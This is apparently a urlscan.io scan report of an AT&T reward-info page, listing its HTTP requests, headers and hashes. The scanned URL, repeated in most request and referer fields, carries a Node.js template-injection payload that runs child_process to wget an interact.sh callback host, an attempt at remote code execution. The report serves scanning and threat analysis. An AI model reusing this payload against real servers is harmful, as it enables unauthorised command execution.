URL: http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252...
Submission: On October 22 via manual from US — Scanned from DE

Summary

This website contacted 2 IPs in 1 country across 2 domains to perform 17 HTTP transactions. The main IP is 40.89.249.127, located in Des Moines, United States and belongs to MICROSOFT-CORP-MSN-AS-BLOCK, US. The main domain is rewardinfo.groupo.com.
This is the only time rewardinfo.groupo.com was scanned on urlscan.io!

urlscan.io Verdict: No classification

Domain & IP information

Requests  IP Address     AS    Autonomous System
16        40.89.249.127  8075  (MICROSOFT...)
Total: 17 requests, 2 IPs

Requests  Apex Domain / Subdomains      Transfer
16        groupo.com
            rewardinfo.groupo.com       562 KB
0         msecnd.net                    Failed
            az416426.vo.msecnd.net      Failed
Total: 17 requests, 2 domains

Requests  Domain                             Requested by
16        rewardinfo.groupo.com              rewardinfo.groupo.com
0         az416426.vo.msecnd.net (Failed)    rewardinfo.groupo.com
Total: 17 requests, 2 domains

This site contains links to these domains:

Domain
rewardcenter.att.com
www.att.com
about.att.com

This page contains 1 frames:

Primary Page: http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Frame ID: 44F0F04CDEC9A0A102E71EBD97B0EA67
Requests: 17 HTTP requests in this frame

Page Title

AT&T Reward Info - Reward Process

Detected technologies

Overall confidence: 100%
Detected patterns
  • <link[^>]* href=[^>]*?bootstrap(?:[^>]*?([0-9a-fA-F]{7,40}|[\d]+(?:.[\d]+(?:.[\d]+)?)?)|)[^>]*?(?:\.min)?\.css
  • bootstrap(?:[^>]*?([0-9a-fA-F]{7,40}|[\d]+(?:.[\d]+(?:.[\d]+)?)?)|)[^>]*?(?:\.min)?\.js

Overall confidence: 100%
Detected patterns
  • jquery[.-]([\d.]*\d)[^/]*\.js
  • jquery.*\.js(?:\?ver(?:sion)?=([\d.]+))?

Overall confidence: 100%
Detected patterns
  • jquery-ui.*\.js

Page Statistics

Requests: 17
HTTPS: 0 %
IPv6: 0 %
Domains: 2
Subdomains: 2
IPs: 2
Countries: 1
Transfer: 562 kB
Size: 1275 kB
Cookies: 0

17 HTTP transactions

Resource, Path, Size, x-fer, Type, MIME-Type
Primary Request /
rewardinfo.groupo.com/
10 KB
4 KB
Document
General
Full URL
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
7c81206cefc946b3a8e9d236632b1b15a21662b8699764f58864f81de03d9014
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Host
rewardinfo.groupo.com
Connection
keep-alive
Pragma
no-cache
Cache-Control
no-cache
Upgrade-Insecure-Requests
1
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept-Language
de-DE,de;q=0.9
Accept
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding
gzip, deflate

Response headers

Date
Fri, 22 Oct 2021 22:00:27 GMT
Content-Type
text/html; charset=utf-8
Content-Length
3509
Connection
keep-alive
Cache-Control
private
Content-Encoding
gzip
Vary
Accept-Encoding
Server
X-AspNetMvc-Version
5.2
X-AspNet-Version
Request-Context
appId=cid-v1:4e2b0b21-ef68-4fdf-8bad-265bbb46ea78
X-Powered-By
X-Content-Type-Options
nosniff
X-UA-Compatible
X-XSS-Protection
1; mode=block
X-Frame-Options
DENY
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
bootstrap.css
rewardinfo.groupo.com/Content/
205 KB
41 KB
Stylesheet
General
Full URL
http://rewardinfo.groupo.com/Content/bootstrap.css
Requested by
Host: rewardinfo.groupo.com
URL: http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
c057d37620f2fc7c9614d1d63a2428ba1258b4b86a284ca156d5ac7d7f40ef17
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept
text/css,*/*;q=0.1
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Connection
keep-alive
Cache-Control
no-cache

Response headers

Date
Fri, 22 Oct 2021 22:00:27 GMT
Content-Encoding
gzip
X-Content-Type-Options
nosniff
X-AspNet-Version
X-Powered-By
Connection
keep-alive
Content-Length
41770
X-XSS-Protection
1; mode=block
X-UA-Compatible
Last-Modified
Thu, 20 May 2021 04:11:06 GMT
Server
X-Frame-Options
DENY
ETag
"0e9a9272e4dd71:0"
Vary
Accept-Encoding
Content-Type
text/css
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
Accept-Ranges
bytes
Site.css
rewardinfo.groupo.com/Content/
7 KB
2 KB
Stylesheet
General
Full URL
http://rewardinfo.groupo.com/Content/Site.css
Requested by
Host: rewardinfo.groupo.com
URL: http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
d10e676a2b3fe03b566350c7592754d7fec5da27e43fc636bc69151e86e97c1c
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept
text/css,*/*;q=0.1
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Connection
keep-alive
Cache-Control
no-cache

Response headers

Date
Fri, 22 Oct 2021 22:00:27 GMT
Content-Encoding
gzip
X-Content-Type-Options
nosniff
X-AspNet-Version
X-Powered-By
Connection
keep-alive
Content-Length
1946
X-XSS-Protection
1; mode=block
X-UA-Compatible
Last-Modified
Thu, 20 May 2021 04:11:06 GMT
Server
X-Frame-Options
DENY
ETag
"0e9a9272e4dd71:0"
Vary
Accept-Encoding
Content-Type
text/css
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
Accept-Ranges
bytes
rewardProcess2.png
rewardinfo.groupo.com/Content/images/
58 KB
58 KB
Image
General
Full URL
http://rewardinfo.groupo.com/Content/images/rewardProcess2.png
Requested by
Host: rewardinfo.groupo.com
URL: http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
a237a2468d38121e0bc4784de29b04d91031746ddcbb4aac5d28c6e62e5fbf7c
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept
image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Connection
keep-alive
Cache-Control
no-cache

Response headers

Date
Fri, 22 Oct 2021 22:00:28 GMT
X-Content-Type-Options
nosniff
Last-Modified
Thu, 20 May 2021 04:11:06 GMT
Server
X-AspNet-Version
X-Powered-By
X-Frame-Options
DENY
Content-Type
image/png
X-XSS-Protection
1; mode=block
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
59003
ETag
"0e9a9272e4dd71:0"
X-UA-Compatible
rewardTracker.png
rewardinfo.groupo.com/Content/images/
4 KB
5 KB
Image
General
Full URL
http://rewardinfo.groupo.com/Content/images/rewardTracker.png
Requested by
Host: rewardinfo.groupo.com
URL: http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
d7520584465ef1111ab9c20a30f5f76df5dd42015c49a4b334a6a0437b78dd0e
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept
image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Connection
keep-alive
Cache-Control
no-cache

Response headers

Date
Fri, 22 Oct 2021 22:00:28 GMT
X-Content-Type-Options
nosniff
Last-Modified
Thu, 20 May 2021 04:11:06 GMT
Server
X-AspNet-Version
X-Powered-By
X-Frame-Options
DENY
Content-Type
image/png
X-XSS-Protection
1; mode=block
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
4159
ETag
"0e9a9272e4dd71:0"
X-UA-Compatible
VisaCard.png
rewardinfo.groupo.com/Content/images/
8 KB
9 KB
Image
General
Full URL
http://rewardinfo.groupo.com/Content/images/VisaCard.png
Requested by
Host: rewardinfo.groupo.com
URL: http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
316fc0265345a7b05f3268fbac9da36ae19ce7817c7a2caee0a509654562fc03
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept
image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Connection
keep-alive
Cache-Control
no-cache

Response headers

Date
Fri, 22 Oct 2021 22:00:28 GMT
X-Content-Type-Options
nosniff
Last-Modified
Thu, 20 May 2021 04:11:06 GMT
Server
X-AspNet-Version
X-Powered-By
X-Frame-Options
DENY
Content-Type
image/png
X-XSS-Protection
1; mode=block
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
8585
ETag
"0e9a9272e4dd71:0"
X-UA-Compatible
MailerBack.png
rewardinfo.groupo.com/Content/images/
63 KB
63 KB
Image
General
Full URL
http://rewardinfo.groupo.com/Content/images/MailerBack.png
Requested by
Host: rewardinfo.groupo.com
URL: http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
8afaff93835cf5ae2ae106dc6a2b09118c1f5de519979dc442e098b4b17c7c35
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept
image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Connection
keep-alive
Cache-Control
no-cache

Response headers

Date
Fri, 22 Oct 2021 22:00:28 GMT
X-Content-Type-Options
nosniff
Last-Modified
Thu, 20 May 2021 04:11:06 GMT
Server
X-AspNet-Version
X-Powered-By
X-Frame-Options
DENY
Content-Type
image/png
X-XSS-Protection
1; mode=block
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
64316
ETag
"0e9a9272e4dd71:0"
X-UA-Compatible
mailerTracker.png
rewardinfo.groupo.com/Content/images/
12 KB
12 KB
Image
General
Full URL
http://rewardinfo.groupo.com/Content/images/mailerTracker.png
Requested by
Host: rewardinfo.groupo.com
URL: http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
4636fb276425843f39c69c51b2c6e1f0daacaaaab1e24fbc0669b64696d2e2b7
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept
image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Connection
keep-alive
Cache-Control
no-cache

Response headers

Date
Fri, 22 Oct 2021 22:00:28 GMT
X-Content-Type-Options
nosniff
Last-Modified
Thu, 20 May 2021 04:11:06 GMT
Server
X-AspNet-Version
X-Powered-By
X-Frame-Options
DENY
Content-Type
image/png
X-XSS-Protection
1; mode=block
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
12234
ETag
"0e9a9272e4dd71:0"
X-UA-Compatible
mailerTrackerSmall.png
rewardinfo.groupo.com/Content/images/
19 KB
19 KB
Image
General
Full URL
http://rewardinfo.groupo.com/Content/images/mailerTrackerSmall.png
Requested by
Host: rewardinfo.groupo.com
URL: http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
7c52fedc9b7555ff0eb777a34bb3be28236615e2f046dd668fe464c7b16c050d
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept
image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Connection
keep-alive
Cache-Control
no-cache

Response headers

Date
Fri, 22 Oct 2021 22:00:28 GMT
X-Content-Type-Options
nosniff
Last-Modified
Thu, 20 May 2021 04:11:06 GMT
Server
X-AspNet-Version
X-Powered-By
X-Frame-Options
DENY
Content-Type
image/png
X-XSS-Protection
1; mode=block
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
19128
ETag
"0e9a9272e4dd71:0"
X-UA-Compatible
jquery-3.5.1.js
rewardinfo.groupo.com/scripts/
292 KB
113 KB
Script
General
Full URL
http://rewardinfo.groupo.com/scripts/jquery-3.5.1.js
Requested by
Host: rewardinfo.groupo.com
URL: http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
a28d76c983b06d87eb2c6d6deaff7e1d4faf32f12794a92bd5e21c754c06ed9b
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept
*/*
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Connection
keep-alive
Cache-Control
no-cache

Response headers

Date
Fri, 22 Oct 2021 22:00:27 GMT
Content-Encoding
gzip
X-Content-Type-Options
nosniff
X-AspNet-Version
X-Powered-By
Transfer-Encoding
chunked
Connection
keep-alive
X-XSS-Protection
1; mode=block
X-UA-Compatible
Last-Modified
Thu, 20 May 2021 04:11:06 GMT
Server
X-Frame-Options
DENY
ETag
"0e9a9272e4dd71:0"
Vary
Accept-Encoding
Content-Type
application/javascript
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
Accept-Ranges
bytes
jquery-ui.js
rewardinfo.groupo.com/scripts/
470 KB
155 KB
Script
General
Full URL
http://rewardinfo.groupo.com/scripts/jquery-ui.js
Requested by
Host: rewardinfo.groupo.com
URL: http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
e049d2f122ce513df16dd5853a6a8201b79e9c27939b78613b44cec472731ba6
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept
*/*
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Connection
keep-alive
Cache-Control
no-cache

Response headers

Date
Fri, 22 Oct 2021 22:00:27 GMT
Content-Encoding
gzip
X-Content-Type-Options
nosniff
X-AspNet-Version
X-Powered-By
Transfer-Encoding
chunked
Connection
keep-alive
X-XSS-Protection
1; mode=block
X-UA-Compatible
Last-Modified
Thu, 20 May 2021 04:11:06 GMT
Server
X-Frame-Options
DENY
ETag
"0e9a9272e4dd71:0"
Vary
Accept-Encoding
Content-Type
application/javascript
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
Accept-Ranges
bytes
popper.min.js
rewardinfo.groupo.com/scripts/
19 KB
9 KB
Script
General
Full URL
http://rewardinfo.groupo.com/scripts/popper.min.js
Requested by
Host: rewardinfo.groupo.com
URL: http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
c381a4b7597b44e301fa045f6917e52a714d5bdb583e8744f8029d80ec7985ec
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept
*/*
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Connection
keep-alive
Cache-Control
no-cache

Response headers

Date
Fri, 22 Oct 2021 22:00:28 GMT
Content-Encoding
gzip
X-Content-Type-Options
nosniff
X-AspNet-Version
X-Powered-By
Connection
keep-alive
Content-Length
8861
X-XSS-Protection
1; mode=block
X-UA-Compatible
Last-Modified
Thu, 20 May 2021 04:11:06 GMT
Server
X-Frame-Options
DENY
ETag
"0e9a9272e4dd71:0"
Vary
Accept-Encoding
Content-Type
application/javascript
Content-Security-Policy
